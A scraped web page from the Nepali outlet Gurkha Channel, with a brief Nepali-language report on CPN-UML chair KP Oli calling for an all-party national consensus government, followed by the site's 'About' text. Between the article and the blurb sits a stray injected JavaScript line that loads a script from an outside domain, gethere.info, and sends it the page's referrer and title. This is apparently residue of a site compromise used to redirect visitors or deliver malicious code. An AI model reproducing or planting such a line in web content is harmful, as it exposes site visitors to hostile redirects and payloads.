केपी ओली

admin Avatar

नेकपा एमालेका अध्यक्ष केपी ओलीले राष्ट्रलाई सम्मुन्नत अबस्थामा फर्काउन सबै दलको प्रतिनिधी हुने राष्ट्रिय सहमतिय सरकार आबश्यक रहेको बताउनुभएको छ। शनिबार काठमाडौमा आयोजित कार्यक्रममा ओलीले मुलुक बिपत्तीमा परेको अबस्थामा सवै दलहरु एक ठाउमा आउनका लागी सहमति सरकार आवश्यक रहेको बताउनुभएको हो। उहाले अहिलेको अबस्थामा सरकार परिर्वतनको चर्चा चल्नु कुनै नौलो कुरा नभएको उल्लेख गर्दे सरकारको नेतृत्वका बिषयमा भने कुनै छलफल नभएको बताउनुभयो। ओलीले अहिले बहुमतिय सरकार गठनको खेलमा लाग्ने समय नभएकाले सहमतिय सरकार नै चाहिने धारणा पनि राख्नुभयो।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories